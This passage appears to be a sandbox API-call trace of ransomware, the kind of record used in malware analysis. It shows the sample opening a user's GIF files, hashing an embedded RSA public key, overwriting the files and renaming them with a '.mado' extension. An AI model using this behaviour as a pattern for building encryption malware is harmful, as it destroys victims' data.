dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0207.112] GetCurrentThreadId () returned 0x600 [0207.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b817b0 [0207.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b7b538 [0207.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0207.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0207.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x32c64e8 [0207.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0207.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0207.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b819c0 [0207.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.112] GetCurrentThreadId () returned 0x600 [0207.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0207.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0207.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0207.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0207.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b81bd0 [0207.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0207.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0207.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b818b8 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79db8 [0207.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d70 [0207.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0207.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d88 [0207.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0207.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d58 [0207.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0207.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79dd0 [0207.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0207.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0207.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79da0 [0207.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0207.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79de8 [0207.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0207.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0207.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0207.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0207.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0207.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0207.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d70 | out: hHeap=0x2c0000) returned 1 [0207.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d70 [0207.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0207.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0207.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79db8 | out: hHeap=0x2c0000) returned 1 [0207.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b75968 [0207.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79de8 | out: hHeap=0x2c0000) returned 1 [0207.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0207.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0207.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b75b98 [0207.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0207.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b75cb0 [0207.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d70 | out: hHeap=0x2c0000) returned 1 [0207.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0207.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0207.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b81ac8 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81bd0 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81ac8 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75cb0 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b98 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79da0 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79dd0 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d88 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d58 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c64e8 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b819c0 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d40 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87400 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b818b8 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0207.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a80 | out: hHeap=0x2c0000) returned 1 [0207.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0207.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0207.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0207.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0207.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0207.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0207.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0207.116] WriteFile (in: hFile=0x63c, lpBuffer=0x3b87c98*, nNumberOfBytesToWrite=0x11613, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b87c98*, lpNumberOfBytesWritten=0x39cfb14*=0x11613, lpOverlapped=0x0) returned 1 [0207.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87c98 | out: hHeap=0x2c0000) returned 1 [0207.116] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x11618, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.116] WriteFile (in: hFile=0x63c, lpBuffer=0x3b817b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b817b0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0207.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b817b0 | out: hHeap=0x2c0000) returned 1 [0207.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0207.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0207.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0207.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0207.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0207.117] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0207.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0207.117] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0207.117] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0207.117] CloseHandle (hObject=0x63c) returned 1 [0207.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf0) returned 0x32b69d8 [0207.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x900) returned 0x3b7b950 [0207.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0207.119] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\80NZ7_xxR.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\80nz7_xxr.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\80NZ7_xxR.gif.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\80nz7_xxr.gif.mado")) returned 1 [0207.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.120] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0207.121] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x125d3c20, ftCreationTime.dwHighDateTime=0x1d5dc67, ftLastAccessTime.dwLowDateTime=0x88be9210, ftLastAccessTime.dwHighDateTime=0x1d5e2bb, ftLastWriteTime.dwLowDateTime=0x88be9210, ftLastWriteTime.dwHighDateTime=0x1d5e2bb, nFileSizeHigh=0x0, nFileSizeLow=0x13816, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ar_JzZLjw MdzmtPt.gif", cAlternateFileName="AR_JZZ~1.GIF")) returned 1 [0207.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0207.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x136) returned 0x336fe98 [0207.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292eb8 | out: hHeap=0x2c0000) returned 1 [0207.121] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\ar_JzZLjw MdzmtPt.gif") returned=".gif" [0207.121] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\ar_JzZLjw MdzmtPt.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\ar_jzzljw mdzmtpt.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0207.123] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=79894) returned 1 [0207.123] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0207.125] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x137f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.125] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0207.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0207.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.127] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0207.127] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x13816, lpOverlapped=0x0) returned 1 [0207.128] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0207.128] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.128] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.128] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0207.129] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0207.129] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0207.129] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0207.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0207.129] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0207.129] GetLastError () returned 0x0 [0207.129] CryptDestroyHash (hHash=0x32ef238) returned 1 [0207.129] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0207.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0207.129] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0207.129] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0207.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0207.129] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0207.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0207.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x13820) returned 0x3b87c98 [0207.130] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0207.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0207.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0207.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0207.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0207.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0207.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87400 [0207.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d40 [0207.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87448 [0207.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d58 [0207.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79d88 [0207.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79dd0 [0207.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79da0 [0207.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0207.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0207.130] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0207.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0207.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79d88 | out: hHeap=0x2c0000) returned 1 [0207.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79da0 | out: hHeap=0x2c0000) returned 1 [0207.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79dd0 | out: hHeap=0x2c0000) returned 1 [0207.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0207.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 